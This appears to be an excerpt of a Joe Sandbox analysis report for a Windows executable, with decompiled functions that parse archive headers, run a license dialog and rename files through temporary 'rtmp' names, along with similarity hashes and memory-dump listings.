0x01028f59

APIs

_free.LIBCMT ref: 01028EC5

Part of subcall function 010284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958), ref: 010284F4
Part of subcall function 010284DE: GetLastError.KERNEL32(01033958,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958,01033958), ref: 01028506

_free.LIBCMT ref: 01028ED1
_free.LIBCMT ref: 01028EDC
_free.LIBCMT ref: 01028EE7
_free.LIBCMT ref: 01028EF2
_free.LIBCMT ref: 01028EFD
_free.LIBCMT ref: 01028F08
_free.LIBCMT ref: 01028F13
_free.LIBCMT ref: 01028F1E
_free.LIBCMT ref: 01028F2C

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e9e90c257413d22f514a4ac76d89e305f6ff2bcc5f141850ab58e3ccfcddea48
Instruction ID: 45d0ab63a5551a99d0d488a8be1567064a80657a489da2288eacac7eb83f0f23
Opcode Fuzzy Hash: e9e90c257413d22f514a4ac76d89e305f6ff2bcc5f141850ab58e3ccfcddea48
Instruction Fuzzy Hash: 1C11B37A50011DBFCB11EF94C840CDA3BE9FF14350B5180EAFA488F625DA31EA51DB80

Uniqueness

Uniqueness Score: -1.00%

Function 01002162, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01002162(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E0101E360();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E0100C6E0(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E0100C6E0(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E0100C6E0(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E0100C6E0(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E0100C6E0(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E0100C6E0(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E0100C6E0(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E0100C593(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E0100400A(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E01003FB5(_t257, _t240 + 0x28, _t167);
												}
												E0100C642(_t318, _t240 + 0x10a1, 0x10);
												E0100C642(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E0100C642(_t318, _t240 + 0x10c2, 8);
													E0100C642(_t318, _t344 + 0x30, 4);
													E0100F8C7(_t344 + 0x58);
													E0100F90D(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E0100F7D6(_t344 + 0x5c);
													_t161 = E0101FDFA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E0101FDFA(_t325, 0x1033668, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E0100400A(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E01003FB5(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E0100C6E0(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E0100C642(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E0100C6E0(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E01010DFC(_t240 + 0x1040, _t315, E0100C622(_t278, __eflags), _t315);
													} else {
														E01010DBD(_t240 + 0x1040, _t315, E0100C5E0(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E01010DFC(_t240 + 0x1048, _t315, E0100C622(_t275, __eflags), _t315);
													} else {
														E01010DBD(_t240 + 0x1048, _t315, E0100C5E0(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E01010DFC(_t240 + 0x1050, _t315, E0100C622(_t272, __eflags), _t315);
													} else {
														E01010DBD(_t240 + 0x1050, _t315, E0100C5E0(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E0100C5E0(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E01010A7A(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E0100C5E0(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E01010A7A(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E0100C5E0(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E01010A7A(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E0100C6E0(_t315);
												__eflags = E0100C6E0(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E0100400A(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E0100FE2E(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E0100C6E0(_t315);
											 *(_t240 + 0x2104) = E0100C6E0(_t315) & 0x00000001;
											_t331 = E0100C6E0(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E0100C642(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E0100BD20(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E01011430();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E0100C6E0(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E0100C6E0(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E0100C642(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E0100C6E0(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E0100C642(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E0100C6E0(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E0100C6E0(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E01002034(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}

0x01002167
0x0100216d
0x01002174
0x01002178
0x0100217d
0x01002187
0x010027de
0x010027e5
0x010027e5
0x0100218d
0x0100218f
0x01002195
0x0100219c
0x010021a5
0x010021a7
0x010021ac
0x010021ae
0x010021b0
0x00000000
0x00000000
0x010021c3
0x010021c6
0x010021c8
0x00000000
0x00000000
0x010021ce
0x010021d0
0x00000000
0x010021e0
0x010021e0
0x010021e5
0x010021e9
0x010021ee
0x010021f1
0x010021f3
0x010021f5
0x010021f7
0x010021fb
0x010021ff
0x00000000
0x0100220f
0x01002213
0x01002224
0x01002228
0x0100222d
0x01002233
0x01002237
0x01002240
0x01002258
0x0100225a
0x0100225d
0x0100225d
0x01002260
0x01002260
0x01002266
0x0100226a
0x01002273
0x0100228b
0x0100228d
0x01002290
0x01002290
0x01002273
0x01002293
0x01002297
0x01002297
0x0100229f
0x010022ab
0x010022ad
0x00000000
0x010022be
0x010022be
0x010022c1
0x01002670
0x01002675
0x01002677
0x010026a7
0x010026b5
0x010026bd
0x010026c8
0x010026cb
0x010026d1
0x010026d4
0x010026e3
0x010026e8
0x010026ec
0x010026f0
0x010026f8
0x010026f8
0x01002708
0x01002718
0x0100271d
0x01002724
0x0100272c
0x01002735
0x01002743
0x0100274d
0x0100275a
0x01002763
0x01002769
0x0100277a
0x0100277f
0x01002784
0x01002788
0x0100278c
0x01002792
0x0100279c
0x010027a1
0x010027a4
0x010027a6
0x010027a8
0x010027a8
0x010027a6
0x01002792
0x010027ae
0x010027b5
0x010027bf
0x01002679
0x01002686
0x0100268b
0x0100268f
0x01002693
0x0100269b
0x0100269b
0x00000000
0x01002677
0x010022c7
0x010022ca
0x01002649
0x0100264e
0x01002650
0x00000000
0x00000000
0x01002656
0x0100265e
0x01002668
0x0100231f
0x01002321
0x00000000
0x01002321
0x010022d0
0x010022d3
0x010024ca
0x010024cc
0x00000000
0x00000000
0x010024d2
0x010024dd
0x010024df
0x010024e4
0x010024e8
0x010024ea
0x010024f0
0x010024f4
0x010024f4
0x010024f7
0x010024fb
0x010024fd
0x010024ff
0x01002501
0x01002525
0x01002503
0x01002511
0x01002511
0x0100252a
0x0100252e
0x0100252e
0x01002532
0x01002532
0x01002535
0x01002539
0x0100253b
0x0100253d
0x0100253f
0x01002563
0x01002541
0x0100254f
0x0100254f
0x0100253f
0x01002568
0x0100256e
0x0100256e
0x01002571
0x01002575
0x01002577
0x0100257c
0x0100257e
0x010025a2
0x01002580
0x0100258e
0x0100258e
0x010025a7
0x010025a7
0x010025ab
0x010025b0
0x010025b6
0x010025b8
0x010025be
0x010025c3
0x010025ec
0x010025f1
0x010025c5
0x010025c7
0x010025cc
0x010025d1
0x010025d6
0x010025d8
0x010025da
0x010025e5
0x010025e5
0x010025da
0x010025f6
0x010025fb
0x01002604
0x01002606
0x01002608
0x01002613
0x01002613
0x01002608
0x01002618
0x0100261d
0x0100262a
0x0100262c
0x0100262e
0x0100263d
0x0100263d
0x0100262e
0x0100261d
0x010025b8
0x00000000
0x010025b0
0x010024d4
0x010024d7
0x00000000
0x00000000
0x00000000
0x010024d7
0x010022d9
0x010022dc
0x0100246d
0x0100246f
0x00000000
0x00000000
0x01002475
0x01002480
0x01002482
0x0100248e
0x01002490
0x010024a0
0x010024aa
0x010024af
0x010024c0
0x010024c0
0x00000000
0x01002490
0x01002477
0x0100247a
0x00000000
0x00000000
0x00000000
0x0100247a
0x010022e2
0x010022e5
0x010023f8
0x01002407
0x01002412
0x01002414
0x0100241c
0x01002422
0x0100242f
0x01002434
0x01002434
0x0100244a
0x0100244f
0x0100245a
0x01002462
0x01002463
0x00000000
0x01002463
0x010022eb
0x010022ee
0x0100232d
0x01002334
0x0100233b
0x01002344
0x01002352
0x01002358
0x0100235f
0x01002363
0x01002365
0x0100236e
0x01002375
0x01002377
0x01002379
0x01002379
0x0100237f
0x01002384
0x01002388
0x01002388
0x0100238c
0x0100238e
0x01002397
0x0100239e
0x010023a0
0x010023a2
0x010023a2
0x010023a5
0x010023ae
0x010023b3
0x010023b3
0x010023b7
0x010023be
0x010023c7
0x010023c7
0x010023cd
0x010023d4
0x010023dd
0x010023dd
0x010023e3
0x00000000
0x010023e3
0x010022f3
0x00000000
0x00000000
0x010022fd
0x0100230b
0x0100230b
0x0100230e
0x01002317
0x0100231c
0x0100231d
0x00000000
0x0100231d
0x010027c6
0x010027c6
0x010027c6
0x010027ca
0x010027d0
0x010027d5
0x00000000
0x00000000
0x00000000
0x010027d5
0x0100229f
0x010021ff
0x010021d0
0x010027dd

Strings

x%u, xrefs: 0100267A
xc%u, xrefs: 010026D7
;%u, xrefs: 01002497

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: c4c00c8907d32dadd0fc84e035e9550fc950dfc3cb5b61c65ed36a40850b8d2f
Instruction ID: beece7dcb3b326642290f5f33f2845953e769c399684d76867861aebe571a2e2
Opcode Fuzzy Hash: c4c00c8907d32dadd0fc84e035e9550fc950dfc3cb5b61c65ed36a40850b8d2f
Instruction Fuzzy Hash: 57F129716043415BFB27EF388998BEE7BD97FA4300F0845ADE9C58B2C6DB649444C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0101ACD0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0101ACD0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E0100130B(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E0101CD2E(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0x104c574;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0x1056b7c;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0x105ec94;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0x10620c8(0xf));
					 *0x10620c4(_t34);
					_t30 =  *0x1048444; // 0x0
					E01019635(_t30, __eflags,  *0x1040ed4, _t37,  *0x105ec90, 0, 0);
					L010235CE( *0x105ec94);
					L010235CE( *0x105ec90);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0101acd0
0x0101acd1
0x0101acd7
0x0101acde
0x0101acf7
0x0101ade3
0x0101ade5
0x00000000
0x0101ade5
0x0101acfd
0x0101ad03
0x0101ad30
0x0101ad35
0x0101ad3a
0x0101ad3c
0x0101ad47
0x0101ad47
0x0101ad4d
0x0101ad52
0x0101ad54
0x0101ad60
0x0101ad60
0x0101ad66
0x0101ad6b
0x0101ad6d
0x0101ad71
0x0101ad71
0x0101ad86
0x0101ad8e
0x0101ada4
0x0101adab
0x0101adb1
0x0101adc6
0x0101add1
0x0101addc
0x00000000
0x0101ade2
0x0101ad08
0x0101ad17
0x00000000
0x0101ad17
0x0101ad0d
0x0101ad10
0x0101ad2b
0x0101ad1f
0x0101ad20
0x00000000
0x0101ad20
0x0101ad15
0x0101ad1e
0x00000000
0x0101ad1e
0x00000000

APIs

Part of subcall function 0100130B: GetDlgItem.USER32(00000000,00003021), ref: 0100134F
Part of subcall function 0100130B: SetWindowTextW.USER32(00000000,010335B4), ref: 01001365

EndDialog.USER32(?,00000001), ref: 0101AD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 0101AD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0101AD60
SetWindowTextW.USER32(?,?), ref: 0101AD71
GetDlgItem.USER32(?,00000065), ref: 0101AD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0101AD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0101ADA4

Strings

LICENSEDLG, xrefs: 0101ACE4

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: deb2bb263efa102e764a8cb2c94827d03199176befead13ee2626db260442a29
Instruction ID: f36969715f2b2af475f0fbf7ccb3abc312276bad18521a90d6ce081ec288a522
Opcode Fuzzy Hash: deb2bb263efa102e764a8cb2c94827d03199176befead13ee2626db260442a29
Instruction Fuzzy Hash: 5C21DD32345205FBE3316E25ED49E7B3EADEB4AB46F410004F6C6A6099CA6FA901D731

Uniqueness

Uniqueness Score: -1.00%

Function 01009443, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E01009443(void* __ecx) {
				void* __esi;
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E0101E28C(E01031E7C, _t84);
				E0101E360();
				_t82 =  *(_t84 + 8);
				_t31 = _t84 - 0x4038;
				__imp__GetLongPathNameW(_t82, _t31, 0x800, _t76, _t81, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t82, _t84 - 0x5038, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t91 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E0100BC85(_t91, _t84 - 0x4038);
							_t78 = E0100BC85(_t91, _t84 - 0x5038);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E010117AC( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E010117AC(E0100BC85(_t93, _t82), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t41;
										_t79 = 0;
										while(1) {
											_t95 = _t41;
											if(_t41 != 0) {
												break;
											}
											E0100FE56(_t84 - 0x1010, _t82, 0x800);
											E0100400A(E0100BC85(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E0100A180(_t84 - 0x1010) == 0) {
												_t41 =  *(_t84 - 0x1010);
											} else {
												_t41 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E0100FE56(_t84 - 0x3038, _t82, 0x800);
										_push(0x800);
										E0100BCFB(_t98, _t84 - 0x3038,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3038, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E01009619(_t84 - 0x2038);
											 *((intOrPtr*)(_t84 - 4)) = _t68;
											if(E0100A180(_t82) == 0) {
												_push(0x12);
												_push(_t82);
												_t68 = E0100971E(_t84 - 0x2038);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3038);
											if(_t68 != 0) {
												E010096D0(_t84 - 0x2038);
												E01009817(_t84 - 0x2038, _t82);
											}
											E01009653(_t84 - 0x2038, _t82);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t32;
			}

0x01009448
0x01009452
0x01009459
0x0100945c
0x0100946b
0x01009473
0x01009604
0x01009604
0x01009604
0x01009481
0x0100948a
0x01009492
0x00000000
0x01009498
0x01009498
0x0100949a
0x00000000
0x010094a0
0x010094ac
0x010094bb
0x010094bd
0x010094c2
0x00000000
0x010094c8
0x010094cc
0x010094d1
0x010094d3
0x00000000
0x010094d9
0x010094e1
0x010094e8
0x00000000
0x010094ee
0x010094ee
0x010094f5
0x010094f7
0x010094f7
0x010094fa
0x00000000
0x00000000
0x01009509
0x01009526
0x0100952b
0x0100953c
0x01009549
0x0100953e
0x0100953e
0x01009540
0x01009540
0x01009550
0x01009559
0x00000000
